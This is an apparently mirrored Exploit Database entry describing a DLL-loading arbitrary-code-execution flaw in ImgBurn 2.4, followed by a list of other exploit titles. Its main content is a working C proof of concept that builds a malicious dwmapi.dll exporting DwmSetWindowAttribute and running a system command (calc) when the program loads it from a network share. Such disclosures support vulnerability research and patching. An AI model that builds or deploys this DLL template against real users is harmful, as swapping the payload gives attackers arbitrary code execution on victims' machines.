ImgBurn 2.4 – ‘dwmapi.dll’ DLL Loading Arbitrary Code Execution

Exploit Database
17 阅读

作者： d3c0der

日期： 2011-01-01
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/35163/

// source: https://www.securityfocus.com/bid/45657/info

ImgBurn is prone to an arbitrary-code-execution vulnerability.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

ImgBurn 2.4.0.0 is vulnerable; other versions may also be affected. 

#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }

int egg()
{
system ("calc");
exit(0);
return 0;
}

last Exploits
ImgBurn 2.4 – ‘dwmapi.dll’ DLL Loading Arbitrary Code Execution的更多信息

Microsoft Excel – OLE Arbitrary Code Execution：
Cool PDF Reader 3.0.2.256 – Buffer Overflow：
Free Audio Converter 7.1.5 – Denial of Service (PoC)：
SmartFTP Client 9.0.2623.0 – Denial of Service (PoC)：
Node Browserify 4.2.0 – Remote Code Execution：
httpdx 1.5.2 – Remote Denial of Service (PoC)：
EZHomeTech EzServer 7.0 – Remote Heap Corruption：
NVIDIA Driver – Missing Bounds Check in Escape 0x100009a：